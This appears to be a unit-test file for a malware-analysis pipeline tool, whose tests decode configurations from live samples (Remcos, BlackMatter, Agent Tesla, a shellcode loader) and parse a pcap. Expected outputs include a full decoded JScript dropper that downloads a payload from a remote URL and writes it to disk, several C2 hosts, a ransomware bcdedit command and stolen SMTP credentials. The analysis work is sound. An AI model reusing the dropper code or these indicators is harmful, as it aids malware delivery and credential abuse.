def test_shellcode_loader(self):
    """Recover the download URL embedded in a shellcode loader sample.

    The pipeline anchors on a hex byte pattern, parses a small structure
    whose field ``s`` seeds an ``accu`` keystream, xors the payload with
    it and finally carves a URL out of the plaintext.
    """
    # The harness fetches the sample by SHA-256; this is live malware, so the
    # test needs network access and should only run in an isolated environment.
    sample = self.download_sample(
        '58ba30052d249805caae0107a0e2a5a3cb85f3000ba5479fafb7767e2a5a78f3')
    decoder = load_pipeline(
        'rex yara:50607080.* [| struct LL{s:L}{} | xor -B2 accu[s]:@msvc | xtp url ]'
    )
    # The indicator is deliberately split across two literals so the plain
    # address never appears verbatim in the repository.
    expected = 'http://64.235.39' '.82'
    self.assertEqual(str(sample | decoder), expected)
def test_remcos_sample(self):
    """Decrypt the Remcos ``SETTINGS`` resource and extract its C2 socket.

    Layout as encoded in the pipeline: one byte of key length, the RC4 key
    of that length, then the RC4-encrypted configuration from which
    ``xtp socket`` pulls a ``host:port`` indicator.
    """
    sample = self.download_sample(
        'c0019718c4d4538452affb97c70d16b7af3e4816d059010c277c4e579075c944')
    decoder = load_pipeline(
        'perc SETTINGS [| put keylen cut::1 | rc4 cut::keylen | xtp socket ]'
    )
    # Defanged: the live host name is split so it is not a greppable IOC.
    expected = 'remm.duckdns' '.' 'org:7007'
    self.assertEqual(expected, str(sample | decoder))
def test_sockaddr_decoding(self):
    """Render two packed dwords (sockaddr_in-like layout) as ``a.b.c.d:port``.

    The struct skips two bytes, reads a big-endian 16-bit port and four
    address bytes; the address bytes are then reformatted as dotted decimal
    before ``cfmt`` joins both parts.
    """
    decoder = load_pipeline(
        'emit "0x51110002 0xAFBAFA12" | pack -B4 | struct 2x{port:!H}{addr:4}{} ['
        ' | push var:addr [| pack -R [| sep . ]| pop addr ]| cfmt {addr}:{port} ]'
    )
    rendered = decoder()
    self.assertEqual(rendered, B'18.250.186.175:4433')
def test_pe_extraction_from_pcap(self):
    """Carve an HTTP transfer out of a pcap and pin the extracted file by hash.

    ``pcap-http`` reassembles HTTP transfers; ``pick 3`` selects the chunk at
    index 3, whose ``url`` meta variable and body are both checked.
    """
    capture = self.download_sample(
        '1baf0e669f38b94487b671fab59929129b5b1c2755bc00510812e8a96a53e10e')
    extractor = load_pipeline('pcap-http [| pick 3 ]')
    transfer = next(capture | extractor)
    # Split literal on purpose: keeps the live download URL out of the source tree.
    self.assertEqual(transfer['url'], B'http://www.tao168188' B'.com:1046/mh.exe')
    # Pinning the SHA-256 of the carved body catches silent regressions in
    # TCP reassembly or HTTP parsing that would otherwise go unnoticed.
    digest = hashlib.sha256(transfer).hexdigest()
    self.assertEqual(
        digest, '9972394d4d8d51abf15bfaf6c1ddfe9c8bf85ae0b9b0a561adfd9b4844c520b9')
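def filter(self, chunks):
    """Fold all incoming chunks into one by repeatedly applying the reduction pipeline.

    The first chunk, or ``--init`` when given, seeds the accumulator. Each
    further chunk is stored in the accumulator's meta under the name given
    by ``--temp``, the reduction pipeline is applied to the accumulator, and
    its output replaces the accumulator's body. The meta of every consumed
    chunk is merged into the accumulator, later chunks overriding earlier keys.

    Yields the final accumulator exactly once. With no input chunks and no
    ``--init`` nothing is yielded: the original ``next(it)`` would have let
    StopIteration escape from a generator, which PEP 479 turns into a
    RuntimeError rather than an empty result.
    """
    it: Iterable[Chunk] = iter(chunks)
    name = self.args.temp
    init = self.args.init
    if init is None:
        data = next(it, None)
        if data is None:
            return
    else:
        data = self.labelled(init)
    # The reduction steps are joined with tabs before being handed to load_pipeline.
    unit: Unit = load_pipeline('\t'.join(self.args.reduction))
    for chunk in it:
        data.meta.update(chunk.meta)
        data[name] = chunk
        unit.args(data)
        data[:] = unit.act(data)
    yield data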
def test_blackmatter_sample(self):
    """Decrypt the BlackMatter string table and check for known markers.

    The 32-bit seed ``KS`` is read from ``.rsrc``; every dword of ``.data``
    is xored with a multiply-add keystream derived from it, NUL bytes are
    stripped and printable strings of at least 8 characters are carved.
    """
    sample = self.download_sample(
        'c6e2ef30a86baa670590bd21acf5b91822117e0cbe6060060bc5fe0182dace99')
    decoder = load_pipeline(
        'push [| vsect .rsrc | struct {KS:L}{} | pop | vsect .data | struct -m L{:{0}}'
        '| xor -B4 "accu[KS,1,32]:(A*0x8088405+1)#((KS*A)>>32)" | repl h:00 | carve -n8 printable ]]'
    )
    decoded = str(sample | decoder).splitlines(False)
    # A user-agent fragment, a hard-coded bcdedit command line, the bot-id
    # format string and the ransom note header all have to survive decryption.
    self.assertIn('Safari/537.36', decoded)
    self.assertIn('bcdedit /set {current} safeboot network', decoded)
    self.assertTrue(
        any('"bot_company":"%.8x%.8x%.8x%.8x%"' in line for line in decoded))
    self.assertTrue(
        any('BlackMatter Ransomware encrypted all your files!' in line for line in decoded))
def test_agent_tesla_sample(self):
    """Decrypt Agent Tesla's .NET config fields and extract the SMTP exfiltration credentials.

    Each field is AES-decrypted with a 32-byte key and 16-byte IV taken from
    the front of the field (``x::32`` / ``x::16``); the regex then picks the
    address, password and host lines out of the joined plaintext.
    """
    sample = self.download_sample(
        'fb47a566911905d37bdb464a08ca66b9078f18f10411ce019e9d5ab747571b40')
    decoder = load_pipeline(
        R'dnfields [| aes x::32 --iv x::16 -Q | sep ]| rex -M "((??email))\n(.*)\n(.*)\n:Zone" addr={1} pass={2} host={3}'
    )
    lines = str(sample | decoder).splitlines(False)
    # The mail address and host are split across literals so that the live
    # indicators do not appear verbatim in the source.
    expected = [
        'addr=ioanna@pgm' '-gruop' '.eu',
        'pass=Password2019',
        'host=smtp.pgm' '-gruop' '.eu',
    ]
    self.assertListEqual(lines, expected)
def test_get_request_summary(self):
    """List the request line of every HTTP GET found in the capture, in order."""
    capture = self.download_sample(
        '1baf0e669f38b94487b671fab59929129b5b1c2755bc00510812e8a96a53e10e')
    summary = load_pipeline(R'pcap [| rex "^GET\s[^\s]+" | sep ]')
    observed = str(capture | summary)
    # Live hosts are split across literals to keep them out of IOC scanners.
    # The count.asp request carries host identifiers (MAC address, computer
    # name), which looks like a check-in beacon from the infected machine.
    expected = (
        'GET /286/pop.asp?url=http://www.puma164.' 'com/pu/39685867.htm?2',
        'GET /favicon.ico',
        'GET /286//update.txt',
        'GET /286/soft/163.exe',
        'GET /286/count/count.asp?mac=00-0E-0C-33-1C-80&ver=2007051922&user=00&md5=258a993832e5f435cc3a7ba4791bc3de&pc=BOBTWO',
        'GET /mh.exe',
        'GET /12.exe',
        'GET /286/pop.asp?url=http://59.34.197.' '164:81/804635/adx352133.asp',
    )
    self.assertEqual(observed, '\n'.join(expected))
def test_example_02_maldoc(self):
    """Unwrap the reversed-base64 JScript dropper embedded in a malicious document.

    The document text is extracted, cleaned with a ``repl`` pass, the base64
    blob is carved and the reverse/base64/reverse layering undone before the
    script is pretty-printed for comparison.
    """
    document = self.download_sample(
        'ee103f8d64cd8fa884ff6a041db2f7aa403c502f54e26337c606044c2f205394')
    decoder = load_pipeline(
        'doctxt | repl drp:c: | carve -s b64 | rev | b64 | rev | ppjscript'
    )
    # The recovered script is a downloader: it fetches a payload over HTTP
    # and writes it to disk under a .jpg name. The URL is split across
    # literals so the live indicator is not present verbatim.
    expected_script = (
        r'var girlLikeDoor = new ActiveXObject("msxml2.xmlhttp");',
        r'girlLikeDoor.open("GET", "http://shoulderelliottd'
        r'.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8'
        r'?cid=Bm9cAP&wP8zhkK=aNLC3bJChZM5GauIB&=S0MRS72jqtkORxKA3iUkjdS", false);',
        r'girlLikeDoor.send();',
        r'if (girlLikeDoor.status == 200) {',
        r' try {',
        r' var karolYouGirl = new ActiveXObject("adodb.stream");',
        r' karolYouGirl.open;',
        r' karolYouGirl.type = 1;',
        r' karolYouGirl.write(girlLikeDoor.responsebody);',
        r' karolYouGirl.savetofile("c:\\users\\public\\tubeGirlLoad.jpg", 2);',
        r' karolYouGirl.close;',
        r' } catch (e) {}',
        r'}',
    )
    self.assertEqual(str(document | decoder), '\n'.join(expected_script))
def emit(line: str, cell=None):
    """Run ``emit <line>`` through the pipeline loader and render it on a fake TTY.

    ``cell`` optionally holds the continuation of a multi-line command; it
    is folded onto ``line`` with every line break (plus following indent)
    collapsed to a single space. The input is authored alongside the docs
    and treated as trusted; nothing is validated or escaped here.

    Args:
        line: the command text following ``emit``.
        cell: optional continuation text, or None.
    """
    if cell is not None:
        line += re.sub(R'[\r\n]+\s*', '\x20', cell)
    # Tighten "[ |" and "] |" into "[|" and "]|" so frame brackets parse.
    line = re.sub(R'(?<=\[|\])\x20*\|', '|', line)
    # load_pipeline is cached; drop the cache so this line is parsed afresh.
    load_pipeline.cache_clear()
    load_pipeline(F'emit {line}') | FakeTTY()
def test_emit_keeps_metadata_02(self):
    """A meta variable set inside a nested push/pop frame survives a later ``emit``.

    The clipboard is stubbed with ``baz`` because this test relies on the
    argument-less ``emit`` reading it.
    """
    with temporary_clipboard('baz'):
        pipeline = load_pipeline(
            'emit bort [| push [[| rex (?P<foo>...)t | pop ]| emit | cfmt {foo}{} ]')
        produced = bytes(pipeline())
        self.assertEqual(produced, b'borbaz')
def test_emit_keeps_metadata_01(self):
    """A meta variable set with ``put`` is still visible after an argument-less ``emit``.

    The clipboard is stubbed with ``baz``, which the bare ``emit`` is
    expected to read and append.
    """
    with temporary_clipboard('baz'):
        pipeline = load_pipeline('emit a [| put foo bar | emit | cfmt {foo}{} ]')
        produced = bytes(pipeline())
        self.assertEqual(produced, b'barbaz')
def test_simple_01(self):
    """A quoted, backslash-escaped Windows path is carved, unescaped and accepted by ``iffp path``."""
    # Raw bytes literal: the doubled backslashes are kept as escape sequences
    # inside the quoted string, which `carve -d string` is expected to undo.
    encoded = BR'"C:\\work\\is\\fun\\"'.hex()
    pipeline = load_pipeline(
        RF'emit H:{encoded} | carve -d string [| iffp path ]')
    produced = pipeline()
    self.assertEqual(produced, B'C:\\work\\is\\fun\\')
def test_hex_byte_strings(self):
    """``cfmt`` renders a hash meta variable as its hex digest when formatted with ``!r``."""
    pipeline = load_pipeline('emit Hello [| cm -2 | cfmt {sha256!r} ]')
    # Expected value is SHA-256("Hello").
    expected = b'185f8db32271fe25f561a6fc938b2e264306ec304eda518007d1764826381969'
    self.assertEqual(pipeline(), expected)
def test_intrinsic_properties_are_recomputed(self):
    """The ``size`` meta variable tracks the chunk body after it has been sliced."""
    pipeline = load_pipeline('emit FOO-BAR [| cm size | snip :1 | cfmt {size} ]')
    # After `snip :1` only one byte remains, so size must read 1, not 7.
    self.assertEqual(pipeline(), B'1')
def test_units_can_overwrite_parent_metavars(self):
    """An inner ``rex`` match overrides the ``offset`` set by the enclosing match."""
    (match,) = load_pipeline('emit ABCD [| rex .... | rex B ]')
    # 'B' sits at index 1 of ABCD; the outer match at offset 0 must not win.
    self.assertEqual(match['offset'], 1)
def test_scroll_past_invisible_chunks(self):
    """``pop`` assigns from the first visible chunk even when earlier chunks were hidden by ``iff``."""
    pipeline = load_pipeline(
        'emit FOO [| push [| rex . | pick :1 | iff size -eq 1 | pop o ]| ccp var:o ]'
    )
    # The popped variable holds 'F', which ccp prepends to the original FOO.
    self.assertEqual(pipeline(), B'FFOO')
def test_msvc(self):
    """Xor 32 zero bytes with the ``@msvc`` accumulator keystream seeded from ``s``.

    Because the input is all zeros, the output is the raw 16-bit keystream,
    which is pinned here as a regression vector.
    """
    pipeline = loader.load_pipeline(
        'emit rep[32]:H:00 [| put s 0xF23CA2 | xor -B2 accu[s]:@msvc ]')
    expected = bytes.fromhex(
        '500BC53065647A48899EE4D7F07166A7643AB3EC9F4343A64DF5C45B4CC4D9B2')
    self.assertEqual(pipeline(), expected)
def test_cheap_variable_is_not_discarded(self):
    """For a small chunk, a ``sha256`` meta variable is kept (and expected to reflect the sliced body)."""
    (result,) = load_pipeline('emit rep[0x100]:X [| cm sha256 | snip 1: ]')
    self.assertIn('sha256', result.meta.keys())
    self.assertEqual(
        result.meta['sha256'],
        '439d26737c1313821f1b5e953a866e680a3712086f7b27ffc2e3e3f224e04f3f')
def test_costly_variable_is_discarded(self):
    """For a large chunk, the ``sha256`` meta variable is dropped after the body changes.

    Compare with the 0x100-byte case, where the variable is retained; the
    threshold between the two is internal to the framework.
    """
    (result,) = load_pipeline('emit rep[0x2000]:X [| cm sha256 | snip 1: ]')
    self.assertNotIn('sha256', result.meta.keys())
def test_magic_values_update(self):
    """A ``sha256`` meta variable formatted after ``snip`` refers to the sliced body."""
    pipeline = load_pipeline('emit FOO-BAR [| cm sha256 | snip :3 | cfmt {sha256} ]')
    expected = b'9520437ce8902eb379a7d8aaa98fc4c94eeb07b6684854868fa6f72bf34b0fd3'
    self.assertEqual(pipeline(), expected)
def test_filter_empty_chunks(self):
    """A bare ``iff`` drops empty chunks so that only non-empty ones reach the trailing ``emit``."""
    pipeline = load_pipeline('emit AAA==FCC [| resplit = | b64 | iff | emit . ]')
    # Splitting on '=' yields three pieces; the empty middle one must not produce a dot.
    self.assertEqual(pipeline(), B'..')
def test_bug_conditional_units_generate_empty_chunks(self):
    """Regression: a conditional unit whose test never passes must not yield an empty chunk.

    ``rex ..`` finds nothing in the single byte ``A``, so the frame is empty
    and ``cfmt boom`` must not run; the overall output has to stay empty.
    """
    pipeline = load_pipeline('emit A | rex .. [| iff -t 1 | cfmt boom ]]')
    self.assertEqual(pipeline(), B'')